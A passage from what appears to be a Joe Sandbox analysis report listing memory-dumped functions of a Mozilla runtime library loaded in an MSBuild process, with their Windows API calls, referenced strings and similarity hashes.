free.MOZGLUE(?), ref: 6C4AB578

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 2047719359-0
Opcode ID: 3e436a579ec7ca685af7447228af2b69d1e3d24684868429ffc2fe3fef5a899d
Instruction ID: e09cb67dd0aa5dad32932823d48dba2b58d7c5c2791882bf1b0dc2cfb891d337
Opcode Fuzzy Hash: 3e436a579ec7ca685af7447228af2b69d1e3d24684868429ffc2fe3fef5a899d
Instruction Fuzzy Hash: 6811AE30904B45C7D312CF69C808FA1B3B1FFA6329F11570AE84952F01EBB1B1C68694

Function 6C4D3DE0 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,6C49F20E,?), ref: 6C4D3DF5
fputs.API-MS-WIN-CRT-STDIO-L1-1-0(6C49F20E,00000000,?), ref: 6C4D3DFC
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C4D3E06
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6C4D3E0E

Part of subcall function 6C4CCC00: GetCurrentProcess.KERNEL32(?,?,6C4931A7), ref: 6C4CCC0D
Part of subcall function 6C4CCC00: TerminateProcess.KERNEL32(00000000,00000003,?,?,6C4931A7), ref: 6C4CCC16

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: Process__acrt_iob_func$CurrentTerminatefputcfputs
String ID:
API String ID: 2787204188-0
Opcode ID: 875dcd87ef606e127861c2661114db13d13f3a2e6b5fe8e8a69c469ad108cc69
Instruction ID: 61fc2aaa20325e1040ad8e12c09518ab046d0224bcd75c135770297dff6d8f83
Opcode Fuzzy Hash: 875dcd87ef606e127861c2661114db13d13f3a2e6b5fe8e8a69c469ad108cc69
Instruction Fuzzy Hash: C3F012B16002097FD700AB54DC46DAB376DDB46624F050024FD0857B41D735BD2586FB

Function 6C4E2050 Relevance: 6.0, APIs: 4, Instructions: 33threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C4E205B
AcquireSRWLockExclusive.KERNEL32(?,?,?,00000000,?,6C4E201B,?,?,?,?,?,?,?,6C4E1F8F,?,?), ref: 6C4E2064
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C4E208E
free.MOZGLUE(?,?,?,00000000,?,6C4E201B,?,?,?,?,?,?,?,6C4E1F8F,?,?), ref: 6C4E20A3

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 2047719359-0
Opcode ID: 8eb4b73ae4cdc86fb3c3d9b942737658dd06918385ad978b038ecb4836f56431
Instruction ID: 8d3a24f577f4bb1d6bd143517ca199eaff3c8a79a2d0b4675f60dd45ec3338a6
Opcode Fuzzy Hash: 8eb4b73ae4cdc86fb3c3d9b942737658dd06918385ad978b038ecb4836f56431
Instruction Fuzzy Hash: 06F0BBB11006109BC721DF16D88DF57B7F8EF8A325F11011DE50687B10CB75A906C7D5

Function 6C4E20B0 Relevance: 6.0, APIs: 4, Instructions: 28threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C4E20B7
AcquireSRWLockExclusive.KERNEL32(00000000,?,6C4CFBD1), ref: 6C4E20C0
ReleaseSRWLockExclusive.KERNEL32(00000000,?,6C4CFBD1), ref: 6C4E20DA
free.MOZGLUE(00000000,?,6C4CFBD1), ref: 6C4E20F1

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 2047719359-0
Opcode ID: 9412b34bed3c69fd78f295bb7d43ff9f9b44790c55c4328ef2e0554da684b245
Instruction ID: 3e7e2dbe4528a6be7438c3dcef9ac4f93f678935bbba3b6eae09c7b0bb2fc3de
Opcode Fuzzy Hash: 9412b34bed3c69fd78f295bb7d43ff9f9b44790c55c4328ef2e0554da684b245
Instruction Fuzzy Hash: F2E0EC716006154BC630DF25DC0DD4EB7F9FF8A215702021EE506C3B00DB75B54686D9

Function 6C4E85B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000028,?,?,?), ref: 6C4E85D3

Part of subcall function 6C4ACA10: malloc.MOZGLUE(?), ref: 6C4ACA26

?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,?), ref: 6C4E8725

Strings

map/set<T> too long, xrefs: 6C4E8720

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: Xlength_error@std@@mallocmoz_xmalloc
String ID: map/set<T> too long
API String ID: 3720097785-1285458680
Opcode ID: 96b00194a883f96544ade08e5dccb2fc95a43e9468f162350eb731f910f916da
Instruction ID: 9d5d08aed4b2b3e8eb0af0864871ee55bdfdbb7d64c1bd97060e4990038ab698
Opcode Fuzzy Hash: 96b00194a883f96544ade08e5dccb2fc95a43e9468f162350eb731f910f916da
Instruction Fuzzy Hash: 4A516674A006418FDB01CF28C584F66BBF1BF8A319F1AC19AD8595BB52C335E846CF92

Function 6C49BD40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6C49BDEB
?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C49BE8F

Strings

0, xrefs: 6C49BE5B

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
String ID: 0
API String ID: 2811501404-4108050209
Opcode ID: 42df7f19c92ebdce8346f9d28751040e5ad8cfdcde89f805a2da3d8463af0c10
Instruction ID: c3883e848ce4980445af76723e07651bdb5351265ccca02e8102b5e6259582c1
Opcode Fuzzy Hash: 42df7f19c92ebdce8346f9d28751040e5ad8cfdcde89f805a2da3d8463af0c10
Instruction Fuzzy Hash: 1B418175909755CFC721CF68C481E9BBBF8AF8A348F004B1DF98597621D730D9598B82

Function 6C49F180 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(?,?), ref: 6C49F19B

Part of subcall function 6C4BD850: EnterCriticalSection.KERNEL32(?), ref: 6C4BD904
Part of subcall function 6C4BD850: LeaveCriticalSection.KERNEL32(?), ref: 6C4BD971
Part of subcall function 6C4BD850: memset.VCRUNTIME140(?,00000000,?), ref: 6C4BD97B

mozalloc_abort.MOZGLUE(?), ref: 6C49F209

Strings

d, xrefs: 6C49F1F5

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: CriticalSection$EnterLeavecallocmemsetmozalloc_abort
String ID: d
API String ID: 3775194440-2564639436
Opcode ID: c0d661629826018eacd2e47a059899d014bd17e93b48f7f96da363c5273841d7
Instruction ID: 84b089c312fe3a7c9829936fb4176ef9d1d4358a794b565a46e268103e7e6a98
Opcode Fuzzy Hash: c0d661629826018eacd2e47a059899d014bd17e93b48f7f96da363c5273841d7
Instruction Fuzzy Hash: C7113A36B0265A86EB04CF588D65DFEB779DF46208B16512DEC05ABB11EB31A984C390

Function 6C4D3CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C4D3D19
mozalloc_abort.MOZGLUE(?), ref: 6C4D3D6C

Strings

d, xrefs: 6C4D3D58

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: _errnomozalloc_abort
String ID: d
API String ID: 3471241338-2564639436
Opcode ID: 5c579996f06d255d6ada7fda58a402b9565ae60814475c696079bb0394224826
Instruction ID: ae6695e6e7896094853d80eba034320bc71c39ca17d1d194072baf4f43806d13
Opcode Fuzzy Hash: 5c579996f06d255d6ada7fda58a402b9565ae60814475c696079bb0394224826
Instruction Fuzzy Hash: 2111E235E046889BDB01EF69CC29DEDB775EF86218F46821CE84597B12EB30A584C790

Function 6C4A4730 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C4A44B2,6C51E21C,6C51F7F8), ref: 6C4A473E
GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C4A474A

Strings

GetNtLoaderAPI, xrefs: 6C4A4744

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetNtLoaderAPI
API String ID: 1646373207-1628273567
Opcode ID: ced29c87f71c8827d33bfc46a35b2215865f8a44e6d0adbfe26b0f8f3ce8c6d7
Instruction ID: 66f3bdb36d0dac6ac7669482888a7e11989faab6b2ebb5f180b23bbe2839b7db
Opcode Fuzzy Hash: ced29c87f71c8827d33bfc46a35b2215865f8a44e6d0adbfe26b0f8f3ce8c6d7
Instruction Fuzzy Hash: 01018079B012549FDF00AFA58C59E1E7BF9EB8A361B06006AE905C7B00DB74D802CF95

Function 6C4F6DE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_DISABLE_WALKTHESTACK), ref: 6C4F6E22
__Init_thread_footer.LIBCMT ref: 6C4F6E3F

Strings

MOZ_DISABLE_WALKTHESTACK, xrefs: 6C4F6E1D

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: Init_thread_footergetenv
String ID: MOZ_DISABLE_WALKTHESTACK
API String ID: 1472356752-1153589363
Opcode ID: 69936be935c460773d1c61b68fc134ee8bbf13f2658f709cf81d3fe28a06bd8c
Instruction ID: c81f2b7315379a1e52fe48346de07f0d4c89f7e165e664d042eaaaabca91c128
Opcode Fuzzy Hash: 69936be935c460773d1c61b68fc134ee8bbf13f2658f709cf81d3fe28a06bd8c
Instruction Fuzzy Hash: DFF0E97E609240DFEA00CB68CC5EED677715793219F050265C82947F61D721B517CA97

Function 6C4A9E70 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 6C4A9EEF

Strings

NaN, xrefs: 6C4A9EC1
Infinity, xrefs: 6C4A9EB7

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: Init_thread_footer
String ID: Infinity$NaN
API String ID: 1385522511-4285296124
Opcode ID: 0324af5436b20cf14bc85a2528672f2a3441c308a09aa8f4bf6d7be1aa6ea714
Instruction ID: 7abe47ce924c7efee22f954bef0fbced0b6cbba2c8d5d893e7f83b937c32712e
Opcode Fuzzy Hash: 0324af5436b20cf14bc85a2528672f2a3441c308a09aa8f4bf6d7be1aa6ea714
Instruction Fuzzy Hash: 25F0AFB4728641CAEB00CF98DC4FF6177B1A727319F220B19C5040AF81D7366546CA8A

Function 6C4A6C30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(0KMl,?,6C4D4B30,80000000,?,6C4D4AB7,?,6C4943CF,?,6C4942D2), ref: 6C4A6C42

Part of subcall function 6C4ACA10: malloc.MOZGLUE(?), ref: 6C4ACA26

moz_xmalloc.MOZGLUE(0KMl,?,6C4D4B30,80000000,?,6C4D4AB7,?,6C4943CF,?,6C4942D2), ref: 6C4A6C58

Strings

0KMl, xrefs: 6C4A6C33, 6C4A6C41, 6C4A6C57

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: moz_xmalloc$malloc
String ID: 0KMl
API String ID: 1967447596-2893240743
Opcode ID: 26e400adbc4dd1962c0462c652a8f496a88607757228c19233f06711ec6135b5
Instruction ID: 83744a0006d35fb415bc654ed7d5f0ca57c85ed10e6e92cf01c68d80112620be
Opcode Fuzzy Hash: 26e400adbc4dd1962c0462c652a8f496a88607757228c19233f06711ec6135b5
Instruction Fuzzy Hash: 67E026F1B511002A9B48D8FCAC0DFAA71C8CB346E87044A39EC22C2BCCFA15E4828091

Function 6C4F5900 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

SetEnvironmentVariableW.KERNEL32(MOZ_SKELETON_UI_RESTARTING,6C5151C8), ref: 6C4F591A
CloseHandle.KERNEL32(FFFFFFFF), ref: 6C4F592B

Strings

MOZ_SKELETON_UI_RESTARTING, xrefs: 6C4F5915

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: CloseEnvironmentHandleVariable
String ID: MOZ_SKELETON_UI_RESTARTING
API String ID: 297244470-335682676
Opcode ID: 184f4865f22f022ff2619c2261138fdfff7ac081043da91529e2c518611816ed
Instruction ID: 05acdfe6a12bd465e9ecf973fc1d9f87a8344e70e013af575f157130036f8b68
Opcode Fuzzy Hash: 184f4865f22f022ff2619c2261138fdfff7ac081043da91529e2c518611816ed
Instruction Fuzzy Hash: BAE01A70249240ABDB029B688D0DF457BE89B1233AF558A48E5B993FA1C3B5A841C795

Function 6C4A3850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6C51F860), ref: 6C4A385C
ReleaseSRWLockExclusive.KERNEL32(6C51F860,?), ref: 6C4A3871

Strings

,Ql, xrefs: 6C4A387A

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: ExclusiveLock$AcquireRelease
String ID: ,Ql
API String ID: 17069307-68896265
Opcode ID: 8ef6ec3b52f3b716e449bf07514e0d5f32947f6d5d1d95cac3d17c2f0261f7f9
Instruction ID: 35b52f9398a4b02155c460f5afc72a8709fccc2fac5b4f4f8bebc75cdaf78717
Opcode Fuzzy Hash: 8ef6ec3b52f3b716e449bf07514e0d5f32947f6d5d1d95cac3d17c2f0261f7f9
Instruction Fuzzy Hash: 77E0DF71909A28A78709EFD68C0FE8A7BF8EE076A0306420DE41917E00D770D042C6C9

Function 6C4ABED0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15librarythreadCOMMON

Download Yara Rule

APIs

DisableThreadLibraryCalls.KERNEL32(?), ref: 6C4ABEE3
LoadLibraryExW.KERNEL32(cryptbase.dll,00000000,00000800), ref: 6C4ABEF5

Strings

cryptbase.dll, xrefs: 6C4ABEF0

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: Library$CallsDisableLoadThread
String ID: cryptbase.dll
API String ID: 4137859361-1262567842
Opcode ID: 6895cf830bfda7aecdde297b1e3a75581b964b3595c586636ba22101c1d14325
Instruction ID: 284ad14ea608c2cabd65b02058fc7b4cb6aa32c180f9a5086f0befa243b1325e
Opcode Fuzzy Hash: 6895cf830bfda7aecdde297b1e3a75581b964b3595c586636ba22101c1d14325
Instruction Fuzzy Hash: 5DD0C73118410CEADA40BB908D0EF1637749711716F10C121F75554E51D7B19455CF95

Function 6C4950E0 Relevance: 5.2, APIs: 4, Instructions: 213COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6C494E9C,?,?,?,?,?), ref: 6C49510A
memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6C494E9C,?,?,?,?,?), ref: 6C495167
memcpy.VCRUNTIME140(036477E8,?,?,?,?,?), ref: 6C495196
memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6C494E9C), ref: 6C495234

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 933be0c35787ef1d59b8af2b73a0f28f4363cc6c90fe8bc4464883a815d3fd0d
Instruction ID: 06b4b910ccd11e8cb37e07ceba279b840a6255ccf7aab97891ad21796de95749
Opcode Fuzzy Hash: 933be0c35787ef1d59b8af2b73a0f28f4363cc6c90fe8bc4464883a815d3fd0d
Instruction Fuzzy Hash: E1917A75905626CFCB14CF08C490E5ABBB2AF89318B298688EC589B715D371FC42CBE1

Function 6C4D08F0 Relevance: 5.2, APIs: 4, Instructions: 165COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C51E7DC), ref: 6C4D0918
LeaveCriticalSection.KERNEL32(6C51E7DC), ref: 6C4D09A6
EnterCriticalSection.KERNEL32(6C51E7DC,?,00000000), ref: 6C4D09F3
LeaveCriticalSection.KERNEL32(6C51E7DC), ref: 6C4D0ACB

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: f037ab7f7907486fab5a9f541fb3d18a40d35122773d9fd1e8ff9e19334d8093
Instruction ID: 439ab79fca416fefa4632ce949849c285f4a744a0b5fa196532ec76cf423d34a
Opcode Fuzzy Hash: f037ab7f7907486fab5a9f541fb3d18a40d35122773d9fd1e8ff9e19334d8093
Instruction Fuzzy Hash: A35117367015908BFB08EB19C86DE2573B1EB82B25727426EDD6597F80DB70F80187C5

Function 6C4F59C0 Relevance: 5.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

malloc.MOZGLUE(?,?,?,?,?,?,?,?,00000008,?,6C4CE56A,?,|UrlbarCSSSpan,0000000E,?), ref: 6C4F5A47
memset.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,?,?,00000008,?,6C4CE56A,?,|UrlbarCSSSpan), ref: 6C4F5A5C
free.MOZGLUE(?), ref: 6C4F5A97
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000010), ref: 6C4F5B9D

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: free$mallocmemset
String ID:
API String ID: 2682772760-0
Opcode ID: 5fd22efa471fada29b982b52f1d3a8fa71d727b6b09bf13719f2fce0113b5c52
Instruction ID: 271bf762c80a7a210a4c265b5ce8a59285edf90e693ebcbab480c48aa98668b8
Opcode Fuzzy Hash: 5fd22efa471fada29b982b52f1d3a8fa71d727b6b09bf13719f2fce0113b5c52
Instruction Fuzzy Hash: 7E516E70A087409FD701CF29C8C4E1ABBE5AF89318F04C96DE8989B746D774D946CB62

Function 6C4EB5C0 Relevance: 5.1, APIs: 4, Instructions: 145COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,6C4EB2C9,?,?,?,6C4EB127,?,?,?,?,?,?,?,?,?,6C4EAE52), ref: 6C4EB628

Part of subcall function 6C4E90E0: free.MOZGLUE(?,00000000,?,?,6C4EDEDB), ref: 6C4E90FF
Part of subcall function 6C4E90E0: free.MOZGLUE(?,00000000,?,?,6C4EDEDB), ref: 6C4E9108

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C4EB2C9,?,?,?,6C4EB127,?,?,?,?,?,?,?,?,?,6C4EAE52), ref: 6C4EB67D
